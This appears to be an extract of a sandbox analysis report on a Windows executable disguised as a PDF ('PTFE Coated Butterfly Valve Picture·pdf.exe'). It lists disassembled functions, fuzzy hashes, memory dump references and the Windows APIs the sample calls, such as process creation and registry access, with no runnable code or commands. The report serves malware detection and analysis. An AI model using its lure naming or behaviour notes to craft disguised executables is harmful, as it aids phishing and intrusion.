Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4bbaf917c5b2b4b29eca7dd879fe0279583c9caa0a8680a3fb668f2eecfa979
Instruction ID: ac331763182a67db8ffe8b732b67c8974d54266b30473341b06133cd37c0d4bc
Opcode Fuzzy Hash: b4bbaf917c5b2b4b29eca7dd879fe0279583c9caa0a8680a3fb668f2eecfa979
Instruction Fuzzy Hash: ECA13171E00229CBDF28DFA8C8547ADBBB1FB44305F11816ED816BB281C7786A96CF44

Function 0040697A Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4b2f824491321a50731860d46817135270c8e97721ba662834ece50dc26027
Instruction ID: e89747aace1fce0fcb13a8d80e6f88749465aa03c559881c8099c8d07fdfb4d2
Opcode Fuzzy Hash: db4b2f824491321a50731860d46817135270c8e97721ba662834ece50dc26027
Instruction Fuzzy Hash: BE911070E04228CBDF28DF98C8547ADBBB1FB44305F15816ED816BB281C778AA96DF44

Function 00406690 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adca5b2b6989107afceee3a061708c38461c5fc9fc0daf484043dfdf7e09805a
Instruction ID: d456333056e0522eb9a81365918d8492ce98a85054e5b278218ea4b7938feab7
Opcode Fuzzy Hash: adca5b2b6989107afceee3a061708c38461c5fc9fc0daf484043dfdf7e09805a
Instruction Fuzzy Hash: E1814671D04228CFDF24CFA8C8847ADBBB1FB44305F25816AD416BB281C778AA96DF44

Function 00406195 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bfff9db2859b877ca6a77ec9405565887134ef839be144d68b3806b8d7c08ac
Instruction ID: 4327eab70650ef0c96a691b493921a8ab8e5ba0d824f916f670fcb6a13d6a8f8
Opcode Fuzzy Hash: 5bfff9db2859b877ca6a77ec9405565887134ef839be144d68b3806b8d7c08ac
Instruction Fuzzy Hash: 11816671D04228DBDF24CFA8C8447ADBBB1FB44315F2181AED856BB281C7786A96DF44

Function 004065E3 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f3dabd0af62f4e8bfcd4b659d73a5ba33a7939e144f292b7bb16ba2439e66e8
Instruction ID: 63ee65aff5d1ea53a99bb7455827a561e54e570c364fe5978cc4b9ff32097947
Opcode Fuzzy Hash: 2f3dabd0af62f4e8bfcd4b659d73a5ba33a7939e144f292b7bb16ba2439e66e8
Instruction Fuzzy Hash: E9711271D04228CBDF24CFA8C8547ADBBF1FB48305F15806AD856BB281D7786A96DF44

Function 00406701 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83d4d9fa97144311a3e66a470cde7927608ab55fe6dc8c436fded4a10c430ead
Instruction ID: 2ec41c1936be718984cf19d05ce660ecedc56656b80368bbb2ce29215557a5c8
Opcode Fuzzy Hash: 83d4d9fa97144311a3e66a470cde7927608ab55fe6dc8c436fded4a10c430ead
Instruction Fuzzy Hash: 53712571E04228CBDF28CF98C854BADBBB1FB44305F15816ED856BB281C7785996DF44

Function 0040664D Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b21a4910564614c6641403ac362d6aa440f40f6368f9ee5d1983abbc3d5a3b8
Instruction ID: 94740bf10ed9628fc2a816943eb7322e71ed29eec5e37d1a6fe0f7c23d4f3e83
Opcode Fuzzy Hash: 1b21a4910564614c6641403ac362d6aa440f40f6368f9ee5d1983abbc3d5a3b8
Instruction Fuzzy Hash: 1D714571E04228CBDF28CF98C854BADBBB1FB44305F11806ED856BB281C7786A96DF44

Function 00401B23 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00401B92
GlobalAlloc.KERNEL32(00000040,00000404), ref: 00401BA4

Strings

CreateTimer, xrefs: 00401B4A, 00401B50, 00401B6A

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Global$AllocFree
String ID: CreateTimer
API String ID: 3394109436-4043936699
Opcode ID: 6d590f43eb69b2c4634e3aaa82c59157183b08f5ad10ff4766659c2d74b3500e
Instruction ID: 3d889d12a0135df13ad9dc84ed8322f06a4567648c243a49bcaf602cfbc5661a
Opcode Fuzzy Hash: 6d590f43eb69b2c4634e3aaa82c59157183b08f5ad10ff4766659c2d74b3500e
Instruction Fuzzy Hash: 9721C376604301ABDB10EB95DE84A5F73B9EB48314720853BF202B32D5D778E8119F6E

Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00404F12: lstrlenA.KERNEL32(sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
Part of subcall function 00404F12: lstrcatA.KERNEL32(sportspladsers,00402FCF,00402FCF,sportspladsers,00000000,0040E8C0,00000000), ref: 00404F6E
Part of subcall function 00404F12: SetWindowTextA.USER32(sportspladsers,sportspladsers), ref: 00404F80
Part of subcall function 00404F12: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
Part of subcall function 00404F12: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
Part of subcall function 00404F12: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE

Part of subcall function 0040548A: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004054B3
Part of subcall function 0040548A: CloseHandle.KERNEL32(?), ref: 004054C0

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: 6f417624348e7a4d8987f4dc8f5a8d32866f9ac343c01c93fb87d8a6b3917473
Instruction ID: 49f7d359c4d218189077cc8fb8a526ed56d4096950e75cb47e310611910bd6fc
Opcode Fuzzy Hash: 6f417624348e7a4d8987f4dc8f5a8d32866f9ac343c01c93fb87d8a6b3917473
Instruction Fuzzy Hash: C4016D31904104EBDF11AFA1C984A9E77B2EF00354F10817BFA01B52E1C7785A85AB9A

Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nst5070.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 43fdcb12208ecf4b22dbb00b887fd4ca96f50bb9be14fb34037b2d673bee9bdf
Instruction ID: 5ce6926f2417f3d17e5e854e85a0bcf64bccf2bfa1e8e40673093317e398bbc6
Opcode Fuzzy Hash: 43fdcb12208ecf4b22dbb00b887fd4ca96f50bb9be14fb34037b2d673bee9bdf
Instruction Fuzzy Hash: A711A771905205EFDF14DF64C6889AEBBB4EF11349F20843FE541B62C0D2B84A85DB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D

Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
RegCloseKey.ADVAPI32(00000000), ref: 00402330

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: bac01e1814f4caa420f9743e48035a2343af4fd9601bd9a3d86b447afdead7f5
Instruction ID: 0b8f6a46cfbad05769843233fc9109b41d2ceb5d24a7fa4f39b64bc1fd674853
Opcode Fuzzy Hash: bac01e1814f4caa420f9743e48035a2343af4fd9601bd9a3d86b447afdead7f5
Instruction Fuzzy Hash: CDF04473A00110ABDB10BFA48A4EAAE72799B50345F14443BF201B61C1D9BD4D12966D

Function 00404FE4 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00404FF4

Part of subcall function 00403F2A: SendMessageA.USER32(00010448,00000000,00000000,00000000), ref: 00403F3C

OleUninitialize.OLE32(00000404,00000000), ref: 00405040

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 6abcb503da36ffa97e6d3a1e0f86c88eeef9b2304b7b5e8d823ec30a8e2ca1ea
Instruction ID: 217987375aced081d1e1e684f869fbcf2dfeeb51b4bb814d2c2c1d189237c18b
Opcode Fuzzy Hash: 6abcb503da36ffa97e6d3a1e0f86c88eeef9b2304b7b5e8d823ec30a8e2ca1ea
Instruction Fuzzy Hash: 06F0F6F2904202A7DB605F109C0071A77B4DBD4346F40403EFE04722A0D67E89428A9D

Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00010454), ref: 00401579
ShowWindow.USER32(0001044E), ref: 0040158E

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: eefc9c2eba5680e91e0ebc83984cde26ecf89c5aeacf34c607b8bcbd51dc0c8b
Instruction ID: 6a1362a081380b38d7ea923c07575874152cb2511cc7df5c202f84d8e6e7dbc6
Opcode Fuzzy Hash: eefc9c2eba5680e91e0ebc83984cde26ecf89c5aeacf34c607b8bcbd51dc0c8b
Instruction Fuzzy Hash: AEF0E577B182806FDB25DB74EE8086E7BF6DB9531075901BFD101A3591C2B89C08D728

Function 00406092 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
GetProcAddress.KERNEL32(00000000,?), ref: 004060BF

Part of subcall function 00406024: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603B
Part of subcall function 00406024: wsprintfA.USER32 ref: 00406074
Part of subcall function 00406024: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406088

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction ID: f390ed2799c289b087c769a87f24dfac638062b8da6604b2acd18c4b1555f769
Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction Fuzzy Hash: B4E08632644111A6D320A7709D0493B72EC9E84710302483EF906F2191D738AC259669

Function 0040596C Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe,80000000,00000003), ref: 00405970
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992

Memory Dump Source

